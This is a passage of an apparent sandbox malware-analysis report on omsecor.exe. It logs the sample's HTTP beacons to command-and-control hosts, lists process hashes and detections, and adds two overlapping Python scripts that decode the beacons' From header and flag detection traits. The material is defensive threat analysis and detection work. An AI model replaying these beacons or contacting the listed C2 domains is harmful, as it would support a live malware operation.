    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49788 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe

Timestamp: Nov 1, 2024 16:22:21.379038095 CET | Bytes transferred: 186 | Direction: OUT | Data:
    GET /719/772.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: lousta.net
    Connection: Keep-Alive


Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49830 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe

Timestamp: Nov 1, 2024 16:22:30.121573925 CET | Bytes transferred: 186 | Direction: OUT | Data:
    GET /106/649.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: lousta.net
    Connection: Keep-Alive


Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49879 | Destination IP: 15.197.204.56 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe

Timestamp: Nov 1, 2024 16:22:38.729095936 CET | Bytes transferred: 190 | Direction: OUT | Data:
    GET /87/444.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive

Timestamp: Nov 1, 2024 16:22:39.356230974 CET | Bytes transferred: 259 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: openresty
    Date: Fri, 01 Nov 2024 15:22:39 GMT
    Content-Type: text/html
    Content-Length: 114
    Connection: keep-alive
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Timestamp: Nov 1, 2024 16:22:57.845740080 CET | Bytes transferred: 191 | Direction: OUT | Data:
    GET /126/170.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive

Timestamp: Nov 1, 2024 16:22:58.006225109 CET | Bytes transferred: 259 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: openresty
    Date: Fri, 01 Nov 2024 15:22:57 GMT
    Content-Type: text/html
    Content-Length: 114
    Connection: keep-alive
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49885 | Destination IP: 52.34.198.229 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe

Timestamp: Nov 1, 2024 16:22:39.478585005 CET | Bytes transferred: 301 | Direction: OUT | Data:
    GET /65/168.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: ow5dirasuek.com
    Connection: Keep-Alive
    Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0

Timestamp: Nov 1, 2024 16:22:40.327507973 CET | Bytes transferred: 340 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 15:22:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 49891 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe

Timestamp: Nov 1, 2024 16:22:40.463457108 CET | Bytes transferred: 186 | Direction: OUT | Data:
    GET /810/632.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: lousta.net
    Connection: Keep-Alive


Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 49938 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe

Timestamp: Nov 1, 2024 16:22:49.244889975 CET | Bytes transferred: 186 | Direction: OUT | Data:
    GET /639/772.html HTTP/1.1
    From: 133749481401170560
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
    Host: lousta.net
    Connection: Keep-Alive
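
The requests in the sessions above share one shape: a GET for /<digits>/<digits>.html, no User-Agent, a purely numeric From header, and a Via header that is not the received-protocol/pseudonym pair the header is defined to carry. The From value is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC): 133749481198045666 decodes to 2024-11-01 15:21:59 UTC, about two seconds before the first request of the %AppData% copy (PID 3756), and 133749481401170560 decodes to 15:22:20 UTC, about one second before the first request of the SysWOW64 copy (PID 1268), so it most likely records when each instance started. The Python below is an added example for this page, not code from the sample, from Neconyd or from Joe Sandbox: it parses the two beacons copied from sessions 0 and 4 plus one constructed benign request, decodes the From timestamps and reports which traits each request trips. The benign request and every function name are the example's own.

```python
"""Parse the omsecor.exe HTTP beacons from the sessions above and flag the
traits that set them apart from browser traffic.

Added example for this report, not code from the sample or from Joe Sandbox.
SESSION_0 and SESSION_4 are copied from the sessions above; BENIGN and all
function names are constructed for the example.
"""
import re
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100 ns ticks since 1601-01-01 00:00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Every beacon path seen above is /<digits>/<digits>.html.
_BEACON_PATH = re.compile(r"^/\d+/\d+\.html$")
# A genuine Via value starts with a received-protocol such as "1.1 " or "HTTP/1.1 ".
_VIA_RECEIVED_PROTOCOL = re.compile(r"^(?:HTTP/)?\d\.\d\s")

SESSION_0 = (  # PID 3756, %AppData%\omsecor.exe, copied from session 0
    "GET /404/921.html HTTP/1.1\r\n"
    "From: 133749481198045666\r\n"
    "Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be\r\n"
    "Host: lousta.net\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
SESSION_4 = (  # PID 1268, SysWOW64\omsecor.exe, copied from session 4
    "GET /719/772.html HTTP/1.1\r\n"
    "From: 133749481401170560\r\n"
    "Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\\j`w<+61+53.03\\44-12.40242a.e^`6a08]`\r\n"
    "Host: lousta.net\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
BENIGN = (  # constructed control request, not from the report
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Via: 1.1 proxy.example.net\r\n"
    "Connection: keep-alive\r\n\r\n"
)


def filetime_to_datetime(ticks: int) -> datetime:
    """Convert a FILETIME tick count to an aware UTC datetime (microsecond precision)."""
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, version and a header dict.

    Header names are lower-cased; a repeated header keeps its last value,
    which is enough for the single-valued headers examined here.
    """
    head = raw.replace("\r\n", "\n").strip("\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # first colon only; Via values contain ':'
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def neconyd_indicators(req: dict) -> list:
    """Return the reasons a parsed request resembles the omsecor.exe beacons."""
    h = req["headers"]
    reasons = []
    if req["method"] == "GET" and _BEACON_PATH.match(req["path"]):
        reasons.append("path is /<digits>/<digits>.html")
    if "user-agent" not in h:
        reasons.append("no User-Agent header")
    frm = h.get("from", "")
    if frm.isdigit():
        try:
            when = filetime_to_datetime(int(frm))
        except (OverflowError, ValueError):  # digits, but outside the FILETIME range
            when = None
        if when is not None and 2000 <= when.year <= 2100:
            reasons.append("From is a FILETIME (%s)" % when.isoformat(timespec="seconds"))
    via = h.get("via", "")
    if via and not _VIA_RECEIVED_PROTOCOL.match(via):
        reasons.append("Via is not a received-protocol/pseudonym pair")
    return reasons


def triage(raw_requests: list) -> list:
    """Summarise each raw request as host, path and the indicators it trips."""
    rows = []
    for raw in raw_requests:
        req = parse_http_request(raw)
        rows.append({
            "host": req["headers"].get("host", ""),
            "path": req["path"],
            "indicators": neconyd_indicators(req),
        })
    return rows


if __name__ == "__main__":
    for row in triage([SESSION_0, SESSION_4, BENIGN]):
        verdict = "BEACON" if len(row["indicators"]) >= 3 else "ok"
        print("%-6s %s%s  %s" % (verdict, row["host"], row["path"], "; ".join(row["indicators"])))
```

Each trait on its own is weak (plenty of tooling omits User-Agent, and a numeric From is merely odd), so the verdict in the script requires three of the four to coincide; the Host values lousta.net, mkkuei4kdsz.com and ow5dirasuek.com from the sessions above are the IOCs to pair it with in a proxy log search.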


Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 49983 | Destination IP: 52.34.198.229 | Destination Port: 80 | PID: 1268 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:22:58.116975069 CET | Bytes transferred: 301 | Direction: OUT
Data:
GET /524/9.html HTTP/1.1
From: 133749481401170560
Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
Host: ow5dirasuek.com
Connection: Keep-Alive
Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0
Timestamp: Nov 1, 2024 16:22:58.960884094 CET | Bytes transferred: 340 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 15:22:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 49989 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:22:59.171910048 CET | Bytes transferred: 161 | Direction: OUT
Data:
GET /128/758.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
Host: lousta.net
Connection: Keep-Alive


Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 49995 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:07.775427103 CET | Bytes transferred: 161 | Direction: OUT
Data:
GET /107/805.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
Host: lousta.net
Connection: Keep-Alive


Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 49996 | Destination IP: 15.197.204.56 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:16.369029999 CET | Bytes transferred: 166 | Direction: OUT
Data:
GET /932/965.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
Host: mkkuei4kdsz.com
Connection: Keep-Alive
Timestamp: Nov 1, 2024 16:23:16.998203993 CET | Bytes transferred: 259 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 01 Nov 2024 15:23:16 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 49997 | Destination IP: 52.34.198.229 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:17.118930101 CET | Bytes transferred: 278 | Direction: OUT
Data:
GET /913/437.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
Host: ow5dirasuek.com
Connection: Keep-Alive
Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0
Timestamp: Nov 1, 2024 16:23:17.946367025 CET | Bytes transferred: 340 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 15:23:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 49998 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:18.179202080 CET | Bytes transferred: 169 | Direction: OUT
Data:
GET /883/755.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: lousta.net
Connection: Keep-Alive


Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 49999 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:26.788692951 CET | Bytes transferred: 168 | Direction: OUT
Data:
GET /761/49.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: lousta.net
Connection: Keep-Alive


Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 50001 | Destination IP: 15.197.204.56 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:35.949491024 CET | Bytes transferred: 174 | Direction: OUT
Data:
GET /477/877.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: mkkuei4kdsz.com
Connection: Keep-Alive
Timestamp: Nov 1, 2024 16:23:36.587837934 CET | Bytes transferred: 259 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 01 Nov 2024 15:23:36 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 50002 | Destination IP: 52.34.198.229 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:36.713290930 CET | Bytes transferred: 286 | Direction: OUT
Data:
GET /503/726.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: ow5dirasuek.com
Connection: Keep-Alive
Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0
Timestamp: Nov 1, 2024 16:23:37.569514036 CET | Bytes transferred: 340 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 15:23:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 50003 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:37.791393042 CET | Bytes transferred: 169 | Direction: OUT
Data:
GET /526/179.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: lousta.net
Connection: Keep-Alive


Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 50004 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:46.399684906 CET | Bytes transferred: 169 | Direction: OUT
GET /171/705.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: lousta.net
Connection: Keep-Alive


Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 50005 | Destination IP: 15.197.204.56 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:55.166052103 CET | Bytes transferred: 174 | Direction: OUT
GET /558/583.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: mkkuei4kdsz.com
Connection: Keep-Alive
Timestamp: Nov 1, 2024 16:23:55.834677935 CET | Bytes transferred: 259 | Direction: IN
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 01 Nov 2024 15:23:55 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID: 22 | Source IP: 192.168.2.6 | Source Port: 50006 | Destination IP: 52.34.198.229 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:55.993933916 CET | Bytes transferred: 286 | Direction: OUT
GET /640/808.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: ow5dirasuek.com
Connection: Keep-Alive
Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0
Timestamp: Nov 1, 2024 16:23:56.826276064 CET | Bytes transferred: 340 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 15:23:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474636|1730474540|18|6|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (the chunked-encoding last-chunk marker; the response carries no body)


Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 50007 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:23:57.054321051 CET | Bytes transferred: 168 | Direction: OUT
GET /761/32.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: lousta.net
Connection: Keep-Alive


Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 50009 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3908 | Process: C:\Windows\SysWOW64\omsecor.exe
Timestamp: Nov 1, 2024 16:24:05.688517094 CET | Bytes transferred: 169 | Direction: OUT
GET /691/461.html HTTP/1.1
From: 133749481401170560
Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
Host: lousta.net
Connection: Keep-Alive
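
The sessions above share one shape: a GET for a path of the form /NNN/NNN.html, no User-Agent, the same 18-digit From: value in every request, and an opaque Via: value. The Python below is an added example, not part of the Joe Sandbox report; it retypes two of the requests (sessions 19 and 22) as constructed input, extracts those traits, and decodes the From: value as a Windows FILETIME. That reading is an observation made here, not something the report states, but it checks out against the page itself: 133749481401170560 ticks is 2024-11-01 15:22:20 UTC, Unix 1730474540, which is exactly the fourth field of the btst cookie the server set in session 22, and it matches the 11:22:20 start time listed for Target ID 5 in the process list once the four-hour gap between that list's clock and the GMT Date headers is allowed for.

```python
"""Beacon-header analysis for the omsecor.exe HTTP sessions (added example, not report code)."""
import re
from datetime import datetime, timezone

# Seconds between the FILETIME epoch (1601-01-01) and the Unix epoch (1970-01-01).
FILETIME_EPOCH_OFFSET = 11644473600
# Every request path in the sessions above has this shape.
BEACON_PATH = re.compile(r"^/\d{1,3}/\d{1,3}\.html$")

# Constructed input: two requests retyped from the session dumps above (sessions 19 and 22).
REQUESTS = [
    "GET /526/179.html HTTP/1.1\r\n"
    "From: 133749481401170560\r\n"
    "Via: ij`]mcu85/0\\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\\mjaqtns\r\n"
    "Host: lousta.net\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /640/808.html HTTP/1.1\r\n"
    "From: 133749481401170560\r\n"
    "Via: ij`]mcu85/0\\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\\mjaqtns\r\n"
    "Host: ow5dirasuek.com\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7"
    "|173.254.250.82|1730474617|1730474540|18|5|0\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, version and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def filetime_to_unix(filetime):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01) to whole Unix seconds."""
    return filetime // 10_000_000 - FILETIME_EPOCH_OFFSET


def filetime_to_utc(filetime):
    return datetime.fromtimestamp(filetime_to_unix(filetime), tz=timezone.utc)


def btst_fields(cookie_header):
    """Return the '|'-separated fields of the btst cookie, or None if it is absent."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "btst":
            return value.split("|")
    return None


def beacon_indicators(req):
    """List the traits that make a request look like one of the beacons above."""
    h = req["headers"]
    hits = []
    if "user-agent" not in h:
        hits.append("no User-Agent")
    if BEACON_PATH.match(req["path"]):
        hits.append("numeric path " + req["path"])
    frm = h.get("from", "")
    if frm.isdigit() and len(frm) == 18:  # 18 digits is the magnitude of a current FILETIME
        when = filetime_to_utc(int(frm))
        if 2000 <= when.year <= 2100:
            hits.append("From decodes as FILETIME " + when.strftime("%Y-%m-%d %H:%M:%S UTC"))
    return hits


def from_matches_cookie(req):
    """True when the btst cookie's fourth field equals the From: FILETIME in Unix seconds."""
    h = req["headers"]
    fields = btst_fields(h.get("cookie", ""))
    frm = h.get("from", "")
    if not fields or len(fields) < 4 or not frm.isdigit():
        return False
    return int(fields[3]) == filetime_to_unix(int(frm))


if __name__ == "__main__":
    for raw in REQUESTS:
        req = parse_request(raw)
        print(req["headers"]["host"], req["path"], beacon_indicators(req),
              "cookie field 4 == From:", from_matches_cookie(req))
```

Run directly it prints the indicators for each request. Of the three, the From: check is the one worth carrying into a detection: browsers and ordinary HTTP libraries do not send a From: header at all, and one that holds an integer FILETIME rather than an e-mail address identifies this client on its own, independent of the rotating paths and hosts.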


Target ID: 0
Start time: 11:21:59
Start date: 01/11/2024
Path: C:\Users\user\Desktop\nNX5KYQRhg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\nNX5KYQRhg.exe"
Imagebase: 0x400000
File size: 82'768 bytes
MD5 hash: 44A881B87BB2D5DFE7062B9A7538425F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 11:21:59
Start date: 01/11/2024
Path: C:\Users\user\AppData\Roaming\omsecor.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\omsecor.exe
Imagebase: 0x400000
File size: 82'768 bytes
MD5 hash: DCC8263D314F19A3A35E32EDFCCDC942
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 5
Start time: 11:22:20
Start date: 01/11/2024
Path: C:\Windows\SysWOW64\omsecor.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\omsecor.exe
Imagebase: 0x400000
File size: 82'768 bytes
MD5 hash: 1FB6FB78751B952FE1D6BEBA89C93830
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true
